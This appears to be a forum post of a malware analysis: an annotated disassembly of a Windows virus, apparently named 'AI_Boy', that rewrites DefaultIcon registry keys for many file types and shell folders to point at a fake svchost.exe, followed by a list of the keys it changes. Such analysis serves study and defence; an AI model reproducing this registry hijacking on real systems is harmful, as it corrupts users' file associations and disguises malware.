0040243E |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402444 |. 83C4 0C ||add esp, 0C
00402447 |. 3BF4 ||cmp esi, esp
00402449 |. E8 72170000 ||call 00403BC0
0040244E |. 8BF4 ||mov esi, esp
00402450 |. 8D85 DCF8FFFF ||lea eax, dword ptr [ebp-724]
00402456 |. 50 ||push eax ; /<%s>
00402457 |. 8D8D F8FDFFFF ||lea ecx, dword ptr [ebp-208] ; |
0040245D |. 51 ||push ecx ; |<%s>
0040245E |. 68 3CE44200 ||push 0042E43C ; |Format = "%s%s"
00402463 |. 8D95 A4F6FFFF ||lea edx, dword ptr [ebp-95C] ; |
00402469 |. 52 ||push edx ; |s
0040246A |. FF15 14864300 ||call dword ptr [<&USER32.wsprintfA>>; \wsprintfA
00402470 |. 83C4 10 ||add esp, 10
00402473 |. 3BF4 ||cmp esi, esp
00402475 |. E8 46170000 ||call 00403BC0
0040247A |. 8D85 A8F7FFFF ||lea eax, dword ptr [ebp-858]
00402480 |. 50 ||push eax
00402481 |. E8 BA160000 ||call 00403B40
00402486 |. 83C4 04 ||add esp, 4
00402489 |. 0FBE8C05 A5F7>||movsx ecx, byte ptr [ebp+eax-85B]
00402491 |. 83F9 65 ||cmp ecx, 65
00402494 |. 75 47 ||jnz short 004024DD
00402496 |. 8D95 A8F7FFFF ||lea edx, dword ptr [ebp-858]
0040249C |. 52 ||push edx
0040249D |. E8 9E160000 ||call 00403B40
004024A2 |. 83C4 04 ||add esp, 4
004024A5 |. 0FBE8405 A6F7>||movsx eax, byte ptr [ebp+eax-85A]
004024AD |. 83F8 78 ||cmp eax, 78
004024B0 |. 75 2B ||jnz short 004024DD
004024B2 |. 8D8D A8F7FFFF ||lea ecx, dword ptr [ebp-858]
004024B8 |. 51 ||push ecx
004024B9 |. E8 82160000 ||call 00403B40
004024BE |. 83C4 04 ||add esp, 4
004024C1 |. 0FBE9405 A7F7>||movsx edx, byte ptr [ebp+eax-859]
004024C9 |. 83FA 65 ||cmp edx, 65
004024CC |. 75 0F ||jnz short 004024DD
004024CE |. 8D85 A4F6FFFF ||lea eax, dword ptr [ebp-95C]
004024D4 |. 50 ||push eax
004024D5 |. E8 30EBFFFF ||call 0040100A
004024DA |. 83C4 04 ||add esp, 4
004024DD |>^ E9 56FBFFFF |\jmp 00402038
004024E2 |> 8BF4 |mov esi, esp
004024E4 |. 8B8D ACF8FFFF |mov ecx, dword ptr [ebp-754]
004024EA |. 51 |push ecx ; /hSearch
004024EB |. FF15 C0834300 |call dword ptr [<&KERNEL32.FindClose>; \FindClose
004024F1 |. 3BF4 |cmp esi, esp
004024F3 |. E8 C8160000 |call 00403BC0
004024F8 |.^ E9 83FAFFFF \jmp 00401F80
004024FD |> 5F pop edi
004024FE |. 5E pop esi
004024FF |. 5B pop ebx
00402500 |. 81C4 A80C0000 add esp, 0CA8
00402506 |. 3BEC cmp ebp, esp
00402508 |. E8 B3160000 call 00403BC0
0040250D |. 8BE5 mov esp, ebp
0040250F |. 5D pop ebp
00402510 \. C3 retn
00403430 /> \55 push ebp
00403431 |. 8BEC mov ebp, esp
00403433 |. 81EC 60050000 sub esp, 560
00403439 |. 53 push ebx
0040343A |. 56 push esi
0040343B |. 57 push edi
0040343C |. 8DBD A0FAFFFF lea edi, dword ptr [ebp-560]
00403442 |. B9 58010000 mov ecx, 158
00403447 |. B8 CCCCCCCC mov eax, CCCCCCCC
0040344C |. F3:AB rep stos dword ptr es:[edi]
0040344E |. 8BF4 mov esi, esp
00403450 |. 68 341B4300 push 00431B34 ; /<%s> = "C:\WINDOWS\system\svchost.exe"
00403455 |. 68 84E74200 push 0042E784 ; |Format = "%s,0"
0040345A |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C] ; |
00403460 |. 50 push eax ; |s
00403461 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403467 |. 83C4 0C add esp, 0C
0040346A |. 3BF4 cmp esi, esp
0040346C |. E8 4F070000 call 00403BC0
00403471 |. 8BF4 mov esi, esp
00403473 |. 8B4D 08 mov ecx, dword ptr [ebp+8]
00403476 |. 51 push ecx ; /<%s>
00403477 |. 68 68E74200 push 0042E768 ; |Format = "CLSID\%s\DefaultIcon"
0040347C |. 8D95 F8FEFFFF lea edx, dword ptr [ebp-108] ; |
00403482 |. 52 push edx ; |s
00403483 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403489 |. 83C4 0C add esp, 0C
0040348C |. 3BF4 cmp esi, esp
0040348E |. E8 2D070000 call 00403BC0
00403493 |. 8BF4 mov esi, esp
00403495 |. 8D45 FC lea eax, dword ptr [ebp-4]
00403498 |. 50 push eax ; /pHandle
00403499 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040349E |. 6A 00 push 0 ; |Reserved = 0
004034A0 |. 8D8D F8FEFFFF lea ecx, dword ptr [ebp-108] ; |
004034A6 |. 51 push ecx ; |Subkey
004034A7 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
004034AC |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
004034B2 |. 3BF4 cmp esi, esp
004034B4 |. E8 07070000 call 00403BC0
004034B9 |. 8D95 F4FDFFFF lea edx, dword ptr [ebp-20C]
004034BF |. 52 push edx
004034C0 |. E8 7B060000 call 00403B40
004034C5 |. 83C4 04 add esp, 4
004034C8 |. 8BF4 mov esi, esp
004034CA |. 50 push eax ; /BufSize
004034CB |. 8D85 F4FDFFFF lea eax, dword ptr [ebp-20C] ; |
004034D1 |. 50 push eax ; |Buffer
004034D2 |. 6A 02 push 2 ; |ValueType = REG_EXPAND_SZ
004034D4 |. 6A 00 push 0 ; |Reserved = 0
004034D6 |. 6A 00 push 0 ; |ValueName = NULL
004034D8 |. 8B4D FC mov ecx, dword ptr [ebp-4] ; |
004034DB |. 51 push ecx ; |hKey
004034DC |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \修改注册表破坏文件图标指向C:\WINDOWS\system\svchost.exe
004034E2 |. 3BF4 cmp esi, esp
004034E4 |. E8 D7060000 call 00403BC0
004034E9 |. 8BF4 mov esi, esp
004034EB |. 8B55 FC mov edx, dword ptr [ebp-4]
004034EE |. 52 push edx ; /hKey
004034EF |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
004034F5 |. 3BF4 cmp esi, esp
004034F7 |. E8 C4060000 call 00403BC0
004034FC |. 8BF4 mov esi, esp
004034FE |. 8B45 08 mov eax, dword ptr [ebp+8]
00403501 |. 50 push eax ; /<%s>
00403502 |. 68 5CE74200 push 0042E75C ; |Format = "CLSID\%s"
00403507 |. 8D8D E4FBFFFF lea ecx, dword ptr [ebp-41C] ; |
0040350D |. 51 push ecx ; |s
0040350E |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
00403514 |. 83C4 0C add esp, 0C
00403517 |. 3BF4 cmp esi, esp
00403519 |. E8 A2060000 call 00403BC0
0040351E |. 8BF4 mov esi, esp
00403520 |. 8D95 F0FDFFFF lea edx, dword ptr [ebp-210]
00403526 |. 52 push edx ; /pHandle
00403527 |. 68 1F000200 push 2001F ; |Access = KEY_QUERY_VALUE|KEY_SET_VALUE|KEY_CREATE_SUB_KEY|KEY_ENUMERATE_SUB_KEYS|KEY_NOTIFY|20000
0040352C |. 6A 00 push 0 ; |Reserved = 0
0040352E |. 8D85 E4FBFFFF lea eax, dword ptr [ebp-41C] ; |
00403534 |. 50 push eax ; |Subkey
00403535 |. 68 00000080 push 80000000 ; |hKey = HKEY_CLASSES_ROOT
0040353A |. FF15 60834300 call dword ptr [<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
00403540 |. 3BF4 cmp esi, esp
00403542 |. E8 79060000 call 00403BC0
00403547 |. 8BF4 mov esi, esp
00403549 |. 8D8D E8FCFFFF lea ecx, dword ptr [ebp-318]
0040354F |. 51 push ecx ; /pBufSize
00403550 |. 8D95 ECFCFFFF lea edx, dword ptr [ebp-314] ; |
00403556 |. 52 push edx ; |Buffer
00403557 |. 6A 00 push 0 ; |pValueType = NULL
00403559 |. 6A 00 push 0 ; |Reserved = NULL
0040355B |. 6A 00 push 0 ; |ValueName = NULL
0040355D |. 8B85 F0FDFFFF mov eax, dword ptr [ebp-210] ; |
00403563 |. 50 push eax ; |hKey
00403564 |. FF15 7C834300 call dword ptr [<&ADVAPI32.RegQueryVa>; \查询其余文件格式
0040356A |. 3BF4 cmp esi, esp
0040356C |. E8 4F060000 call 00403BC0
00403571 |. 8BF4 mov esi, esp
00403573 |. 8D8D ECFCFFFF lea ecx, dword ptr [ebp-314]
00403579 |. 51 push ecx ; /<%s>
0040357A |. 68 50E74200 push 0042E750 ; |Format = "%s.AI_Boy"
0040357F |. 8D95 E0FAFFFF lea edx, dword ptr [ebp-520] ; |
00403585 |. 52 push edx ; |s
00403586 |. FF15 14864300 call dword ptr [<&USER32.wsprintfA>] ; \wsprintfA
0040358C |. 83C4 0C add esp, 0C
0040358F |. 3BF4 cmp esi, esp
00403591 |. E8 2A060000 call 00403BC0
00403596 |. 8D85 E0FAFFFF lea eax, dword ptr [ebp-520]
0040359C |. 50 push eax
0040359D |. E8 9E050000 call 00403B40
004035A2 |. 83C4 04 add esp, 4
004035A5 |. 8BF4 mov esi, esp
004035A7 |. 50 push eax ; /BufSize
004035A8 |. 8D8D E0FAFFFF lea ecx, dword ptr [ebp-520] ; |
004035AE |. 51 push ecx ; |Buffer
004035AF |. 6A 01 push 1 ; |ValueType = REG_SZ
004035B1 |. 6A 00 push 0 ; |Reserved = 0
004035B3 |. 6A 00 push 0 ; |ValueName = NULL
004035B5 |. 8B95 F0FDFFFF mov edx, dword ptr [ebp-210] ; |
004035BB |. 52 push edx ; |hKey
004035BC |. FF15 64834300 call dword ptr [<&ADVAPI32.RegSetValu>; \相同方法操作
004035C2 |. 3BF4 cmp esi, esp
004035C4 |. E8 F7050000 call 00403BC0
004035C9 |. 8BF4 mov esi, esp
004035CB |. 8B85 F0FDFFFF mov eax, dword ptr [ebp-210]
004035D1 |. 50 push eax ; /hKey
004035D2 |. FF15 68834300 call dword ptr [<&ADVAPI32.RegCloseKe>; \RegCloseKey
0040322C |> \68 08E64200 push 0042E608 ; ASCII "{645FF040-5081-101B-9F08-00AA002F954E}"
00403231 |. E8 15DEFFFF call 0040104B
00403236 |. 83C4 04 add esp, 4
00403239 |. 68 D8E54200 push 0042E5D8 ; ASCII "{20D04FE0-3AEA-1069-A2D8-08002B30309D}"
0040323E |. E8 08DEFFFF call 0040104B
00403243 |. 83C4 04 add esp, 4
00403246 |. 68 A8E54200 push 0042E5A8 ; ASCII "{450D8FbA-AD25-11D0-98A8-0800361B1103}"
0040324B |. E8 FBDDFFFF call 0040104B
00403250 |. 83C4 04 add esp, 4
00403253 |. 68 78E54200 push 0042E578 ; ASCII "{208D2C60-3AEA-1069-A2D7-08002B30309D}"
00403258 |. E8 EEDDFFFF call 0040104B
0040325D |. 83C4 04 add esp, 4
00403260 |. 68 48E54200 push 0042E548 ; ASCII "{871C5380-42A0-1069-A2EA-08002B30309D}"
00403265 |. E8 E1DDFFFF call 0040104B
具体修改了以下:
HKLM\SOFTWARE\Classes\batfile\DefaultIcon
HKLM\SOFTWARE\Classes\cmdfile\DefaultIcon
HKLM\SOFTWARE\Classes\comfile\DefaultIcon
HKLM\SOFTWARE\Classes\dllfile\DefaultIcon
HKLM\SOFTWARE\Classes\inffile\DefaultIcon
HKLM\SOFTWARE\Classes\regfile\DefaultIcon
HKLM\SOFTWARE\Classes\txtfile\DefaultIcon
HKLM\SOFTWARE\Classes\chm.file\DefaultIcon
HKLM\SOFTWARE\Classes\Excel.CSV\DefaultIcon
HKLM\SOFTWARE\Classes\exefile\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\icofile\DefaultIcon
HKLM\SOFTWARE\Classes\jpegfile\DefaultIcon
HKLM\SOFTWARE\Classes\Paint.Picture\DefaultIcon
HKLM\SOFTWARE\Classes\PowerPoint.Show.8\DefaultIcon
HKLM\SOFTWARE\Classes\SoundRec\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.acc\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.mp4\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rm\DefaultIcon
HKLM\SOFTWARE\Classes\stormplayer.rmvb\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR\DefaultIcon
HKLM\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon
HKLM\SOFTWARE\Classes\Word.Document.8\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{208D2C60-3AEA-1069-A2D7-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{450D8FBA-AD25-11D0-98A8-0800361B1103}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\DefaultIcon
HKLM\SOFTWARE\Classes\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\DefaultIcon
|
免费评分
-
查看全部评分
|
[复制链接]
发表于 2009-6-22 04:44
发表于 2009-6-22 10:05
发表于 2009-6-22 16:32
发表于 2009-6-22 20:38
发表于 2009-6-22 21:43
加入管理团队吧
